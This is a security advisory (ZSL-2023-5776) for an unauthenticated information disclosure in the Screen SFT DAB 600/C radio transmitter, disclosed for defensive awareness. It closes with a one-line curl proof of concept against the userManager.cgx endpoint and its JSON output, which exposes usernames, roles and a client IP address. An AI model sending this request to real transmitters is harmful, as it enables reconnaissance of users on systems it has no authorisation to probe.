Headline
Screen SFT DAB 600/C Unauthenticated Information Disclosure
Screen SFT DAB 600/C is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this via a specially crafted request to gain access to sensitive information including usernames and source IP addresses.
Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)Vendor: DB Elettronica Telecomunicazioni SpAProduct web page: https://www.screen.it | https://www.dbbroadcast.com https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/Affected version: Firmware: 1.9.3 Bios firmware: 7.1 (Apr 19 2021) Gui: 2.46 FPGA: 169.55 uc: 6.15Summary: Screen's new radio DAB Transmitter is reaching the highesttechnology level in both Digital Signal Processing and RF domain.SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to thedigital adaptive precorrection and configuatio flexibility, the HotSwap System technology, the compactness and the smart system design,the SFT DAB are advanced transmitters. They support standards DAB,DAB+ and T-DMB and are compatible with major headend brands.Desc: Screen is affected by an information disclosure vulnerabilitydue to improper access control enforcement. An unauthenticated remoteattacker can exploit this, via a specially crafted request to gainaccess to sensitive information including usernames and source IPaddresses.Tested on: Keil-EWEB/2.1 MontaVista® Linux® Carrier Grade eXpress (CGX)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2023-5776Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php19.03.2023--$ curl 'http://SFTDAB/system/api/userManager.cgx'{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}